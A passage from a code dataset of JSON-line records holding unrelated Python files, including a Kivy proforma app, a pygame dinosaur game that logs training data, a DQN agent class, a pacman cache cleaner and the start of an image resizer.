None)))\n\t\tlayouttab1.add_widget(TextInput(text='input', font_size=15, halign ='left', valign='middle',size_hint=(0.6, None),multiline=False, focus=True))\n\t\tlayouttab1.add_widget(Label(text= 'Total Units', font_size=15, size_hint=(0.4, None)))\n\t\tlayouttab1.add_widget(TextInput(text='input', font_size=15, halign ='left', valign='middle',size_hint=(0.6, None),multiline=False, focus=True))\n\t\tlayouttab1.add_widget(Label(text= 'Square Footage', font_size=15, size_hint=(0.4, None)))\n\t\tlayouttab1.add_widget(TextInput(text='input', font_size=15, halign ='left', valign='middle',size_hint=(0.6, None),multiline=False, focus=True))\n\t\tmainlayout.add_widget(layouttab1)\n\t\t#*******CONTENT3*******\n\t\tmainlayout.add_widget(Label(text='Unit Mix',size_hint_x=None, width=200, size_hint_y=None, height=50))\n\t\t#*******CONTENT4*******\n\t\tlayoutmix.add_widget(Label(text='# of Units'))\n\t\tlayoutmix.add_widget(Label(text='Unit Type'))\n\t\tlayoutmix.add_widget(Label(text='SquareFeet'))\n\t\tlayoutmix.add_widget(Label(text='Monthly Rent'))\n\t\tlayoutmix.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutmix.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutmix.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutmix.add_widget(TextInput(text='Input', font_size=15))\n\t\tmainlayout.add_widget(layoutmix)\n\t\t#*******CONTENT7*******\n\t\tmainlayout.add_widget(Label(text='Accounts',size_hint_x=None, width=200, size_hint_y=None, height=50))\n\t\t#*******CONTENT7*******\n\t\tlayoutacc.add_widget(Label(text='Purchase Price'))\n\t\tlayoutacc.add_widget(TextInput(text='Input'))\n\t\tlayoutacc.add_widget(Label(text='Deposit'))\n\t\tlayoutacc.add_widget(TextInput(text='Input'))\n\t\tlayoutacc.add_widget(Label(text='Loan Amount'))\n\t\tlayoutacc.add_widget(TextInput(text='Input'))\n\t\tlayoutacc.add_widget(Label(text='Annual Interest'))\n\t\tlayoutacc.add_widget(TextInput(text='Input'))\n\t\tlayoutacc.add_widget(Label(text='Period'))\n\t\tlayoutacc.add_widget(TextInput(text='Input'))\n\t\tlayoutacc.add_widget(Label(text='Total Cash Outlay'))\n\t\tlayoutacc.add_widget(TextInput(text='Input'))\n\t\tmainlayout.add_widget(layoutacc)\n\t\t#*******CONTENT5*******\n\t\tmainlayout.add_widget(Label(text='Expenses',size_hint_x=None, width=200, size_hint_y=None, height=50))\n\t\t#*******CONTENT6*******\n\t\tlayoutexpense.add_widget(Label(text='Accounting'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15,))\n\t\tlayoutexpense.add_widget(Label(text='Advertising'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='Bank Charges'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='Electricity'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='Gas'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='Security'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='All insurance'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='Permits and fees'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='Maintenance'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='Trash Pick-up'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='All other'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tmainlayout.add_widget(layoutexpense)\n\t\t#*******CALLING-MAINLAYOUT-IN-TAB1*******\n\t\tscroll.add_widget(mainlayout)\n\t\tth_tab1.content = scroll\n\t\ttp_panel.add_widget(th_tab1)\n\t\t\n\t\t#___*******TAB3*******___#\n\t\tth_tab3 = TabbedPanelHeader(text = 'Saved Reports')\n\t\ttp_panel.add_widget(th_tab3)\n\t\n\t#*******ADDING-CONTENTS-OF-SUB-WIDGETS*******\n\t\tlayoutTop.add_widget(menubtn)\n\t\tlayoutTop.add_widget(head)\n\t\tlayoutTop.add_widget(backbtn)\n\t\tlayoutMid.add_widget(tp_panel)\n\t#*******ADDING-CONTENTS-OF-ROOT-WIDGET*******\n\t\tlayout.add_widget(layoutTop)\n\t\tlayout.add_widget(layoutMid)\n\t#*******CALLING-THE-ROOT-WIDGET*******\t\n\t\treturn layout\n\nif __name__ == '__main__':\n\tProforma().run()\n","sub_path":"ver 0.0.1/main01.py","file_name":"main01.py","file_ext":"py","file_size_in_byte":8115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448354237","text":"# Usage:\n# python get_sum.py \n# Example:\n# python get_sum.py 2 3\n# expected output: 5\n\n# problem3: run this program with different arguments and see how it works\n# problem4: read the codes in this file, modify some parts, try to enable three\n# arguments and get the sum of them\nimport argparse\n\nparser = argparse.ArgumentParser()\n\nparser = argparse.ArgumentParser(description='Print the sum of numbers.')\nparser.add_argument(\"num1\", help=\"First number\", type=int)\nparser.add_argument(\"num2\", help=\"Second number\", type=int)\nparser.add_argument(\"num3\", help=\"Third number\", type=int)\n\nargs = parser.parse_args()\nprint( args.num1 + args.num2 + args.num3)\n","sub_path":"lecture1/get_sum.py","file_name":"get_sum.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448499343","text":"import pygame\r\nimport random\r\nimport time\r\nimport csv\r\nimport cv2\r\nimport os, shutil\r\nfrom skimage import exposure\r\nimport numpy as np\r\n\r\n\r\n\r\n\r\n\r\n#THIS GAME WAS BUILT SO THAT A BOT COULD THEN USE NEURAL NETWORKS TO LEARN HOW TO PLAY IT\r\n\r\n#IT IS MEANT TO SIMULATE THE GAME THAT IS PLAYED WHEN GOOGLE BREAKS\r\n\r\n\r\n#INITIAL SETUP\r\n\r\npygame.init()\r\n\r\ndisplay_width = 800\r\ndisplay_height = 600\r\n\r\nblack = (0, 0, 0)\r\nwhite = (255, 255, 255)\r\nbloc_colour = (215, 14, 190)\r\nred = (200, 0, 0)\r\ngreen = (0, 200, 0)\r\nbright_red = (255, 0, 0)\r\nbright_green = (0, 255, 0)\r\n\r\ngameDisplay = pygame.display.set_mode((display_width, display_height))\r\n\r\nrect = pygame.Rect(150, display_height * 0.43, 650, 180)\r\nsub = gameDisplay.subsurface(rect)\r\n\r\n\r\npygame.display.set_caption('Google Game')\r\n\r\nclock = pygame.time.Clock()\r\n\r\n\r\ndinoImg = pygame.image.load(\"dinosaur.jpg\")\r\ndinoImg = pygame.transform.scale(dinoImg, (70, 60))\r\ndinoImg2 = pygame.transform.scale(dinoImg, (70, 20))\r\n\r\n\r\n\r\n\r\n#USED CLASSES\r\n\r\n\r\nclass cactus:\r\n def __init__(self, name, x, y):\r\n self.name = name\r\n self.x = x\r\n self.y = y\r\n self.color = green\r\n self.counted = False\r\n\r\nclass bird:\r\n def __init__(self, name, x, y):\r\n self.name = name\r\n self.x = x\r\n self.y = y\r\n self.color = red\r\n self.counted = False\r\n\r\n\r\n\r\n\r\n#USED FUNCTIONS\r\n\r\n\r\ndef objects_dodged(dodge_count):\r\n font = pygame.font.SysFont(None, 25)\r\n text = font.render(\"Dodged: \" + str(dodge_count), True, black)\r\n gameDisplay.blit(text, (400, 0))\r\n\r\ndef dinosaur(x, y, image):\r\n gameDisplay.blit(image, (x, y))\r\n\r\ndef text_objects(text, font):\r\n textSurface = font.render(text, True, black)\r\n return textSurface, textSurface.get_rect()\r\n\r\ndef message_display(text):\r\n largeText = pygame.font.Font('freesansbold.ttf', 90)\r\n TextSurf, TextRect = text_objects(text, largeText)\r\n TextRect.center = (display_width / 2, display_height / 2)\r\n gameDisplay.blit(TextSurf, TextRect)\r\n pygame.display.update()\r\n time.sleep(1)\r\n game_loop()\r\n\r\ndef crash():\r\n #message_display('Broken dinosaur')\r\n pygame.quit()\r\n quit()\r\n\r\ndef jump(y, u, t, a):\r\n y -= u * t + (0.5 * a * (t ** 2))\r\n v = u + (a * t)\r\n u = v\r\n return y, u\r\n\r\ndef data_capture(n, record1, record2, reward_difference, game_running):#, stacked_list):\r\n\r\n pygame.image.save(sub, \"./GameScreenShots/\" + str(n) + \"screenshot.jpg\")\r\n img = cv2.imread(\"./GameScreenShots/\" + str(n) + \"screenshot.jpg\")\r\n img = cv2.Canny(cv2.resize(img, (100, 100)), 100, 200)\r\n #img = img.reshape(1, 1, img.shape[0], img.shape[1])\r\n\r\n #img = np.append(img, stacked_list[:, :3, :, :], axis=2)\r\n\r\n cv2.imwrite(\"./GameScreenShots/\" + str(n) + \"screenshot.jpg\", img)\r\n\r\n with open('InputData.csv', 'a', newline='') as f:\r\n thewriter = csv.DictWriter(f, fieldnames=fieldnames)\r\n thewriter.writerow({'KeyUp/Down': record1, 'Jump/Duck': record2, 'Reward difference': reward_difference, 'Game Running': game_running})\r\n\r\n #return stacked_list\r\n\r\ndef game_loop():\r\n obj_list = []\r\n x = display_width*0.1\r\n y_initial = display_height*0.65\r\n y = y_initial\r\n u_initial = 220\r\n fps = clock.tick(60)\r\n gameExit = False\r\n cactus_x = 900\r\n count = 0\r\n u = u_initial\r\n a = -160\r\n image = dinoImg\r\n skip = False\r\n duck_land = False\r\n tracker = 0\r\n object_x = 25\r\n object_y = 100\r\n dodged = 0\r\n object_speed = 5\r\n n = 0\r\n blank_image = np.zeros((100, 100, 3), np.uint8)\r\n stacked = np.stack((blank_image, blank_image, blank_image, blank_image), axis=2)\r\n\r\n\r\n\r\n while not gameExit:\r\n record1 = 0\r\n record2 = 0\r\n object_reward = 0\r\n game_running = True\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n\r\n #BELOW DEFINES HOW THE DINOSAUR REACTS TO KEYBOARD INPUTS\r\n\r\n\r\n\r\n if event.type == pygame.KEYDOWN:\r\n record1 = event.type\r\n record2 = event.key # 273 and 274 are the up and down keys\r\n if event.key == pygame.K_UP:\r\n y, u = jump(y, u, 1/fps, a)\r\n image = dinoImg\r\n skip = False\r\n\r\n elif event.key == pygame.K_DOWN and y == y_initial:\r\n image = dinoImg2\r\n y = y_initial + 40\r\n skip = True\r\n\r\n if event.key == pygame.K_DOWN and y < y_initial:\r\n duck_land = True\r\n\r\n if event.type == pygame.KEYUP:\r\n record1 = event.type\r\n record2 = event.key\r\n if event.key == pygame.K_DOWN and u == u_initial:\r\n image = dinoImg\r\n y = y_initial\r\n skip = False\r\n if event.key == pygame.K_DOWN:\r\n duck_land = False\r\n\r\n\r\n if duck_land is True and y == y_initial:\r\n image = dinoImg2\r\n y = y_initial + 40\r\n skip = True\r\n\r\n if y != y_initial and skip == False:\r\n y, u = jump(y, u, 1 / fps, a)\r\n\r\n if y >= y_initial:\r\n y = y_initial\r\n u = u_initial\r\n\r\n\r\n\r\n gameDisplay.fill(white)\r\n objects_dodged(dodged)\r\n pygame.draw.line(gameDisplay, black, (0, 0.6*display_height), (display_width, 0.6*display_height))\r\n dinosaur(x, y, image)\r\n\r\n rand_no = random.randint(0, 100)\r\n\r\n\r\n\r\n #THE TWO IF STATEMENTS BELOW GENERATE THE CACTUS AND BIRDS\r\n if rand_no == 10 and tracker == 0:\r\n cact = cactus(\"cactus\", cactus_x, display_height * 0.57)\r\n obj_list.append(cact)\r\n tracker += 60\r\n\r\n count += 1\r\n\r\n if count > 10 and rand_no == 1 and tracker == 0:\r\n bir = bird(\"bird\", cactus_x, display_height * 0.49)\r\n obj_list.append(bir)\r\n tracker += 60\r\n\r\n count += 1\r\n\r\n for i in obj_list:\r\n if i.x + object_x < 0:\r\n del(obj_list[0])\r\n\r\n image_x = image.get_size()[0]\r\n image_y = image.get_size()[1]\r\n\r\n #BELOW CREATES THE CRASH LOGIC\r\n for i in obj_list:\r\n\r\n i.x -= object_speed\r\n pygame.draw.rect(gameDisplay, i.color, [i.x, i.y, object_x, object_y])\r\n if (y + image_y > i.y) and (y < i.y + object_y):\r\n if (x + image_x > i.x) and (x < i.x + object_x):\r\n round_reward = -1\r\n game_running = False\r\n data_capture(n, record1, record2, round_reward, game_running) #, stacked)\r\n crash()\r\n\r\n if i.x + object_x < x and i.counted == False:\r\n dodged += 1\r\n object_reward = 0.9\r\n object_speed += 0.1\r\n i.counted = True\r\n\r\n if tracker !=0:\r\n tracker -= 1\r\n\r\n\r\n\r\n pygame.display.update()\r\n fps = clock.tick(60)\r\n\r\n\r\n round_reward = 0.1 + object_reward\r\n data_capture(n, record1, record2, round_reward, game_running)#, stacked)\r\n n += 1\r\n\r\n\r\nwith open('InputData.csv', 'w', newline='') as f:\r\n fieldnames = ['KeyUp/Down', 'Jump/Duck', 'Reward difference', 'Game Running']\r\n thewriter = csv.DictWriter(f, fieldnames=fieldnames)\r\n thewriter.writeheader()\r\n\r\n\r\nfolder = './GameScreenShots'\r\nfor the_file in os.listdir(folder):\r\n file_path = os.path.join(folder, the_file)\r\n try:\r\n if os.path.isfile(file_path):\r\n os.unlink(file_path)\r\n except Exception as e:\r\n print(e)\r\n\r\nrunning = True\r\n\r\nwhile running == True:\r\n game_loop()\r\npygame.quit()\r\n\r\nquit()\r\n","sub_path":"google_game.py","file_name":"google_game.py","file_ext":"py","file_size_in_byte":7768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"359005346","text":"import subprocess\nimport random as r\n\nalphavit = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\nnums = [i for i in range(1,20)]\nname = []\n\nprint (nums)\ndef randWord(num):\n\tfor i in range(num):\n\t\trandLet = r.choice(alphavit)\n\t\tname.append(randLet)\n\treturn name\n\ndef randNum():\n\tn = r.choice(nums)\n\treturn n\n\t\n\nfor i in range(45):\n\tname = []\n\tnomer = randNum()\n\tnameFolder = ''.join(str(j) for j in randWord(nomer))\n\tprint(nameFolder)\n\tsubprocess.call(['mkdir',nameFolder])\n","sub_path":"scriptFolder.py","file_name":"scriptFolder.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"377687535","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport codecs\nimport os\n\nfrom setuptools import setup\n\n\ndef read(fname):\n file_path = os.path.join(os.path.dirname(__file__), fname)\n return codecs.open(file_path, encoding='utf-8').read()\n\n\nsetup(\n name='pytest-dev8',\n version='0.1.1',\n author='Simon Kerr',\n author_email='jackofspaces@gmail.com',\n maintainer='Simon Kerr',\n maintainer_email='jackofspaces@gmail.com',\n license='Apache Software License 2.0',\n url='https://github.com/symonk/pytest-valid8',\n description='to validate an environment before commencing a session',\n long_description=read('README.rst'),\n py_modules=['pytest_valid8'],\n python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*',\n install_requires=['pytest>=5.0.1', 'yaspin>=0.15.0'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Framework :: Pytest',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Testing',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Operating System :: OS Independent',\n 'License :: OSI Approved :: Apache Software License',\n ],\n entry_points={\n 'pytest11': [\n 'valid8 = pytest_valid8',\n ],\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"71032129","text":"# -*- coding: utf-8 -*-\nimport random\nimport numpy as np\nfrom goal_model import Tree, Node\nfrom mind import BrainFunction, BehavioralEngine, ReplayMemory, BehavioralRange, baredom_control, fn_linearbehavioralvalue, fn_constantbehavioralcontrol\nimport math\n\nclass DQNAgent:\n def __init__(self, state_size, action_size, proprioception_size=2):\n if type(state_size) == tuple:\n self.state_size = state_size\n else:\n self.state_size = (state_size, state_size)\n self.nb_behavior = 1\n self.nb_goals = 6\n self.KEY_CODE = 5\n self.GATE_CODE = 4\n self.skip_frames = 4\n\n #No visual input information: touch, object value, min_var, max_var, var, x, y, z, angle, goal\n performerScore = BrainFunction(state_size, proprioception_size, action_size, [ReplayMemory(5000)], self.skip_frames)\n performerScore.epsilon_min = 0.05\n performerScore.epsilon_decay = ((performerScore.epsilon - performerScore.epsilon_min)/10000)\n performerScore.learning_rate = 0.00025 # 0.00025\n performerScore.MAX_RANDOM_STEPS = 1000\n \n \n #performerFollowKey = BrainFunction(state_size, proprioception_size, action_size, [ReplayMemory(10000)], self.skip_frames)\n \n #performerGetKey = BrainFunction(state_size, proprioception_size, action_size, [ReplayMemory(10000)], self.skip_frames)\n \n performerSearchKey = BrainFunction(state_size, proprioception_size, action_size, [ReplayMemory(20000)], self.skip_frames)\n \n #performerEating = BrainFunction(state_size, proprioception_size, action_size, [ReplayMemory(10000)], self.skip_frames)\n #performerEating.epsilon_min = 0.05\n #performerEating.epsilon_decay = ((performerEating.epsilon - performerEating.epsilon_min)/10000)\n #performerEating.learning_rate = 0.00025 # 0.00025\n #performerEating.MAX_RANDOM_STEPS = 1000\n \n #performerFollowTel = BrainFunction(state_size, proprioception_size, action_size, [ReplayMemory(10000)], self.skip_frames)\n #performerFollowTel.epsilon_min = 0.05\n #performerFollowTel.epsilon_decay = ((performerFollowTel.epsilon - performerFollowTel.epsilon_min)/10000)\n #performerFollowTel.learning_rate = 0.00025 # 0.00025\n #performerFollowTel.MAX_RANDOM_STEPS = 1000\n\n #self.performers = [performerEating, performerSearchKey, performerFollowKey, performerGetKey, performerFollowTel, performerScore]\n self.performers = [None]*self.nb_goals\n self.performers[1] = performerSearchKey\n self.baredom = BehavioralRange(\"baredom\", self, 0.0, 0.1, 1.0, fn_control=baredom_control)\n self.last_action = -1\n self.prev_position = None\n self.position = None\n self.prev_dist_to_key = 0\n self.prev_dist_to_gate = 0\n self.target_position = None\n self.energy = 0\n self.baredom_value = 0\n self.score = 0\n self.isWithKey = 0\n self.last_reward = 0.0\n self.gate_position = np.array([262.65, -143.74, 305.13])\n self.MIN_TESTS = 10000\n self.fitness = np.zeros(5)\n self.last_frame = None\n self.touching_food = False\n self.detected_target_counter = 0\n self.to_target_dir = 0.0\n self.orientation = 0\n self.contextual_actions = [0, 1, 2, 3, 4, 5, 6, 7]\n self.baredom_freq = 0.0\n self.action_count = [0]*7\n self.start_time = 0\n self.prev_orientation = self.orientation\n self.goal_test_counter = 0\n\n def get_current_goal(self):\n #if self.touching_food:\n # return 0\n #if self.is_to_learning_search_key():\n return 1\n #if self.is_to_learning_follow_key():\n # return 2\n #if self.is_to_learning_get_key():\n # return 3\n #if self.is_to_learning_follow_gate():\n # return 4\n #return 5\n\n def get_rewards(self):\n return [self.r_get_foods(), self.r_search_key(), self.r_target_follow(), self.r_get_key(), self.r_gate_follow(), self.r_get_score()]\n\n def is_to_learning_follow_gate(self):\n return self.isWithKey\n\n def is_to_learning_get_key(self):\n return (self.get_dist_to_target() < 20) and (not self.isWithKey)\n \n def is_to_learning_follow_key(self):\n return (not self.isWithKey) and (self.KEY_CODE in self.last_frame)\n\n def is_to_learning_search_key(self):\n return (not self.isWithKey) and (not self.KEY_CODE in self.last_frame)\n\n def is_to_learning_eating(self):\n return self.touching_food\n\n def get_walk_dist(self):\n return abs(self.prev_position[0] - self.position[0]) + abs(self.prev_position[2] - self.position[2])\n\n def get_dist_to_target(self):\n return abs(self.position[0] - self.target_position[0]) + abs(self.position[2] - self.target_position[2])\n \n def get_dist_to_gate(self):\n return abs(self.position[0] - self.gate_position[0]) + abs(self.position[2] - self.gate_position[2])\n\n def r_get_score(self): #0\n return self.score\n\n def r_get_foods(self): #3\n return self.last_reward\n\n def r_get_key(self): #2\n if self.get_dist_to_target() < 5:\n return 1.0 if self.isWithKey else -1.0\n else:\n return 0.0\n\n def r_target_follow(self): #4\n if self.get_dist_to_target() < self.prev_dist_to_key:\n return 1\n elif self.get_dist_to_target() > self.prev_dist_to_key:\n return -1\n else:\n return 0\n\n def r_search_key(self): #5\n if self.KEY_CODE in self.last_frame:\n return 1.0\n else:\n return -1.0\n\n def calc_to_target_dir(self):\n tv = self.target_position - self.position\n tv = np.array([tv[0], tv[2]])\n av = np.array([0.0, 1.0])\n x = av[0]\n y = av[1]\n av[0] = x * np.cos(self.orientation) - y * np.sin(self.orientation)\n av[1] = x * np.sin(self.orientation) + y * np.cos(self.orientation)\n nav = np.linalg.norm(av)\n ntv = np.linalg.norm(tv)\n if nav != 0 and ntv != 0:\n av = av/nav\n tv = tv/ntv \n v = np.dot(av, tv)\n #print(v)\n return v\n else:\n return 0\n\n\n def r_gate_follow(self): #1\n if self.get_dist_to_gate() < self.prev_dist_to_gate:\n return 1\n elif self.get_dist_to_gate() > self.prev_dist_to_gate:\n return -1\n else:\n return 0\n\n def r_homeostatic(self):\n return np.tanh(self.baredom_value)\n\n def reset(self, is_new_epoch=True):\n self.baredom_freq = 0.0\n self.action_count = [0]*7\n self.start_time = 0\n for goal in range(self.nb_goals):\n if self.performers[goal] != None:\n self.performers[goal].reset(is_new_epoch)\n self.baredom.current_value = 0\n self.baredom.initial_value = 0\n self.baredom.min = np.random.random() * 0.90\n self.baredom.max = min(1.0, (self.baredom.min + abs(np.random.normal(0.0, 1.0) ) ) )\n self.sum_of_rewards = 0\n self.prev_dist_to_gate = 0\n self.prev_dist_to_key = 0\n self.to_target_dir = 0.0\n self.prev_orientation = self.orientation\n","sub_path":"agents/agent_dqn/bagent.py","file_name":"bagent.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"354426544","text":"import os\nimport uuid\nimport argparse\n\nfrom prep_lobe_data import normalize\n\ndef main():\n parser = argparse.ArgumentParser(description='Create corpus for aligning from LOBE format.')\n parser.add_argument('data', type=str, help='Full path to dataset')\n parser.add_argument('corpus', type=str, help='Destination data folder')\n\n args = parser.parse_args()\n data = args.data\n corpus = args.corpus\n\n f = open(os.path.join(data, \"index.tsv\"))\n lines = f.readlines()\n\n norm2nat = dict()\n for l in lines:\n speaker, recording, text = l.strip().split(\"\\t\")\n\n text_file = os.path.join(data, \"text\", text) \n with open(text_file) as fi:\n text = fi.read()\n norm_text = normalize(text).strip()\n norm2nat[norm_text] = text.strip()\n\n index = open(os.path.join(corpus, \"index.tsv\"))\n fixed = open(os.path.join(corpus, \"index.nat.tsv\"), \"w\")\n for l in index.readlines():\n rid, norm = l.split(\"\\t\")\n fixed.write(\"\\t\".join([\n rid,\n norm2nat[norm.strip()],\n norm.strip(),\n ]) + \"\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tts/norm2nat.py","file_name":"norm2nat.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535150548","text":"#!/usr/bin/env python3\n\nimport os\nimport errno\nimport argparse\nfrom operator import attrgetter\n\nPACKAGES = \"/var/cache/pacman/pkg/\"\nINSTALLED = \"/var/lib/pacman/local\"\nEXTENSIONS = [\"pkg.tar.xz\", \"pkg.tar.gzip\"]\nARCHES = [\"any\", \"x86_64\", \"i686\"]\nNR_OF_PKG = 2\n\n\nclass Package(object):\n '''base class for all kinds of packages, installed or package files'''\n\n def __str__(self):\n return self.name + \"-\" + self.version + \"-\" + self.pkg_version\n \n def __repr__(self):\n return repr((self.name, self.version, self.pkg_version, self.arch))\n\n def __eq__(self, other):\n assert isinstance(other, Package)\n return self.name == other.name and self.version == other.version and self.pkg_version == other.pkg_version and self.arch == other.arch\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __lt__(self, other):\n if self.__eq__(other):\n return false\n elif self.name == other.name:\n if self.version == other.version:\n return self.pkg_version < other.pkg_version\n else:\n return self.version < other.version\n else:\n return self.name < other.name\n \n def __le__(self, other):\n return self.__eq__(other) or self.__lt__(other)\n\n def __gt__(self, other):\n return not self.__le__(other)\n\n def __ge__(self, other):\n return self.__eq__(other) or self.__gt__(other)\n\nclass PkgFile(Package):\n '''Class for holding info about on specific package'''\n\n def __init__(self, filename, path):\n self.filename = filename\n self.fullpath = os.path.join(path, filename)\n self.name, self.version, self.pkg_version, rest = filename.rsplit('-', 3)\n self.arch, self.file_ext = rest.split('.',1)\n\nclass InstalledPkg(Package):\n '''class for installed packages on the system'''\n\n def __init__(self, name, version, arch):\n self.name = name\n self.version, self.pkg_version = version.split('-')\n self.arch = arch\n\nclass PkgList(object):\n '''Class for holding a complete list over package files on the system'''\n\n\n def __str__(self):\n res = \"\"\n for pkg in self.pkg_list:\n if pkg != self.pkg_list[0]:\n res += \"\\n\"\n res += pkg.__str__()\n return res\n\n def sort(self):\n self.pkg_list = sorted(self.pkg_list, key = attrgetter(\"name\", \"version\", \"pkg_version\"))\n\n def names(self):\n return [i.name for i in self.pkg_list ]\n\n def get_by_name(self, name):\n result = []\n for pkg in self.pkg_list:\n if pkg.name == name:\n result.append(pkg)\n return result\n\n def unique(self):\n result = []\n for pkg in self.pkg_list:\n if pkg.name not in result:\n result.append(pkg.name)\n return result\n\nclass PkgFileList(PkgList):\n \n def __init__(self, path):\n self.path = path\n self.pkg_list = []\n filelist = [ f for f in os.listdir(path) if f.endswith(tuple(EXTENSIONS)) ]\n for f in filelist:\n self.pkg_list.append(PkgFile(f, path))\n\nclass InstalledPkgList(PkgList):\n\n def __init__(self, path):\n self.path = path\n self.pkg_list = []\n pkgs = [ p for p in os.listdir(path) if os.path.isdir(os.path.join(path, p)) ]\n for p in pkgs:\n filepath = os.path.join(path, p, \"desc\")\n with open(filepath) as f:\n lines = [ i.strip('\\n') for i in f.readlines() ]\n name = lines[lines.index(\"%NAME%\") + 1]\n version = lines[lines.index(\"%VERSION%\") + 1]\n arch = lines[lines.index(\"%ARCH%\") + 1]\n self.pkg_list.append(InstalledPkg(name, version, arch))\n\ndef uninstalled_packages(pkgfiles, installed):\n result = []\n for pkgfile in pkgfiles.pkg_list:\n if pkgfile.name not in installed.names():\n result.append(pkgfile)\n return result\n\ndef older_than(pkgfiles, installed, number):\n result = []\n for pkg in installed.unique():\n full_list = pkgfiles.get_by_name(pkg)\n if(len(full_list) > number):\n full_list = sorted(full_list, key = attrgetter(\"name\", \"version\",\n\"pkg_version\"))\n #print(full_list)\n if len(full_list[0:-number]) > 0:\n #result.append(full_list[0:-number])\n for pkg in full_list[0:-number]:\n result.append(pkg)\n return result\n\ndef find_files(packages, pkgfiles):\n res = []\n for package in packages:\n for pkgfile in pkgfiles.pkg_list:\n if pkgfile == package:\n res.append(pkgfile)\n return res\n\ndef print_packages(packages):\n for pkg in packages:\n print(pkg)\n\ndef print_installed(packages):\n for pkglist in packages:\n for pkg in pkglist:\n print(pkg)\n\ndef remove_packages(packages):\n for pkg in packages:\n assert isinstance(pkg, PkgFile)\n print(\"deleting... \" + pkg.__str__())\n try:\n os.remove(pkg.fullpath)\n except OSError as e:\n if e.errno == errno.EACCES:\n print(\"You don't have premissions to delete this file. Run as Root?\")\n exit()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Clean up pacman\\'s cache. More flexible than \"pacman -Sc[c]\"')\n\n # REQUIRED ARGUMENTS\n parser.add_argument('--uninstalled', '-u', action = 'store_true', help='list packages that is not installed on the system')\n parser.add_argument('--morethan', '-m', action = 'store_true', help='list packages that has more than the specified number of files in the cache')\n\n # OPTIONAL ARGUMENTS\n parser.add_argument('--delete', action = 'store_true', help='if this option is set, the packages listed by \"uninstalled\" or \"morethan\" is deleted.')\n parser.add_argument('--number', '-n', metavar='n', type=int, default=NR_OF_PKG, help='number of packages that you want to keep as a backup. Defaults to 2.')\n parser.add_argument('--cache_path', '-c', metavar='PATH', type=str, default=PACKAGES, help='optional path to pacman\\'s cache')\n parser.add_argument('--installed_path', '-i', metavar='PATH', type=str, default=INSTALLED, help='optional path to pacman\\'s installed package db')\n\n args = parser.parse_args()\n\n if not (args.uninstalled or args.morethan):\n parser.error(\"Need to specify -u, -t or both\")\n \n installed = InstalledPkgList(args.installed_path)\n pkgfiles = PkgFileList(args.cache_path)\n old = older_than(pkgfiles, installed, args.number)\n uninstalled = uninstalled_packages(pkgfiles, installed)\n\n if not args.delete:\n if args.uninstalled:\n print_packages(uninstalled)\n if args.morethan:\n print_packages(old)\n\n else:\n if args.uninstalled:\n remove_packages(uninstalled)\n if args.morethan:\n old_files = find_files(old, pkgfiles)\n remove_packages(old_files)\n","sub_path":"pacleaner.py","file_name":"pacleaner.py","file_ext":"py","file_size_in_byte":7043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"209183930","text":"#!/usr/bin/env python\n#coding=iso-8859-15\n#Image resizing Programm\nimport PIL\nfrom PIL import Image\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\n#write names of resized images in quotes\n#or use drag and drop\n#----------------------------------------\n\n#function to convert one picture\ndef one():\n\tconvert = input('enter name of picture: ')\n\tx = input('enter width: ')\n\ty = input('enter height: ')\n\tnewsize = (x,y)\n\tname = input('enter name of resized image: ')\n\tos.chdir('images')\n\tos.chdir('resized')\n\timg = 